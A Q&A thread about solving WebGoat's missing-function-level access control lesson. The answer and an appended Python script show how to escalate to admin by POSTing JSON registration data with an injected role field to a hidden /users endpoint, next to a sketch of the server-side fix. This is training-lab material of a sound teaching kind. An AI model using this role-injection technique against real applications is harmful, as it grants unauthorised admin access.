
I've recently installed WebGoat 8.00M12 on my computer and I tried to solve the "Access Control" section for a demonstration in my class.

Everything was simple and smooth till I got stuck at the last point in the "Missing function level access control" lesson subsection, and I have been stuck there for 2 full days now. Can anyone help me, please?

The question is this:

Question

Note: the previous page contained 2 CSS-hidden hyperlinks (/users and /config) that don't work when I click on them or try them (these are supposedly only available for the admin).

What I have done:

  • Using Burp Suite to spider the web application, the intended directories were not found.
  • Tried many combinations like (show-users, users, list-users, display-users) on many directories but just couldn't find the "users page" they talked about in the hints, but I did find some useless page at /WebGoat/users which contained only "su 1", just FYI.

Helpful notes:

  • The web application has a RESTful structure.
  • It runs on Java (I tried reading the source code on GitHub but didn't understand anything).
  • Download WebGoat v8.0 (if you care) Here
Anders
Jamil Hneini

1 Answer


Well, it's kind of a hard challenge.

First, when you click on the human symbol to log out you should notice there is a role: User.

Also, when you visit /users you should notice in the source code a hidden button like "admin" or something like that. So you need to somehow try to change the role.

Log out and try to register again. Notice the POST parameters.

So do the same on /users but with the parameters in a list:

{"parameter1":"value", etc }

Add a new parameter role (value: Admin won't work, so try WebGoat_Admin), and also change:

content-type: application/json

S.L. Barth
aleale
  • Thank you, although this is definitely a bit late xD. I already solved the challenge similar to the way you described it – Jamil Hneini Aug 04 '18 at 18:55
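The request the answer describes, as an added example that is not part of the original question, the answer, or WebGoat's own code. The client half builds the registration POST re-targeted at /users, re-encoded as JSON and carrying the extra role field; the server half is a hypothetical model of why that works (a handler that copies a client-supplied role onto the new account) next to the fix (the server chooses the role and checks it on the hidden endpoint, not only in the menu). The base URL, the form field names (username, password, matchingPassword, agree) and the role string WebGoat_Admin are assumptions taken from the answer and from a default install; adjust them to what you see in Burp.

```python
"""Added example (not from the original post or from WebGoat itself).

Client side: the registration POST, re-targeted at /users, encoded as JSON and
carrying an injected "role" field, as the answer describes.
Server side: a hypothetical model of the flaw (client-supplied role is trusted)
beside the fix (server assigns the role and enforces it on the endpoint).
Field names, URL and role strings are assumptions; check them in Burp.
"""
import json
import urllib.error
import urllib.request

DEFAULT_ROLE = "WEBGOAT_USER"   # assumed default role for a fresh account
ADMIN_ROLE = "WebGoat_Admin"    # the answer says "Admin" is rejected; try this


def build_payload(username, password, role=None):
    """Registration fields as seen in the normal form POST (names assumed),
    plus the injected role when one is given."""
    payload = {
        "username": username,
        "password": password,
        "matchingPassword": password,
        "agree": "agree",
    }
    if role is not None:
        payload["role"] = role  # the field the registration form never sends
    return payload


def build_register_request(base_url, username, password, role=None):
    """Same fields as the form, but POSTed as JSON to /users instead of
    form-encoded to the registration page."""
    body = json.dumps(build_payload(username, password, role)).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/users",
                                 data=body, method="POST")
    req.add_header("Content-Type", "application/json")
    return req


def send(req):
    """Fire the request; returns (status, body). Needs a running WebGoat."""
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")
    except urllib.error.URLError as e:   # nothing listening, DNS, etc.
        return None, str(e.reason)


# --- hypothetical server-side model, not WebGoat's code ---

def vulnerable_register(body):
    """Flaw: whatever role the client sends is stored on the account."""
    return {"username": body["username"], "role": body.get("role", DEFAULT_ROLE)}


def hardened_register(body):
    """Fix: the role is chosen server side; client input cannot raise it."""
    return {"username": body["username"], "role": DEFAULT_ROLE}


def list_users_handler(current_user, users, required_role=ADMIN_ROLE):
    """Fix for the hidden link: hiding /users with CSS is not a control;
    the endpoint itself must check the caller's role."""
    if current_user.get("role") != required_role:
        return 403, None
    return 200, [u["username"] for u in users]


if __name__ == "__main__":
    # Assumed default install: http://localhost:8080/WebGoat
    req = build_register_request("http://localhost:8080/WebGoat",
                                 "mallory", "Passw0rd!", ADMIN_ROLE)
    print(req.get_method(), req.full_url, req.get_header("Content-type"))
    print(req.data.decode())
    print(send(req))
```

Run it with WebGoat up and watch the response; if the role is accepted, logging in as the new user should show the admin role next to the logout symbol and /users should start serving content. The server-side half is the lesson's real point: the role must come from the server and be checked on every privileged route, because a hidden link or button is only presentation.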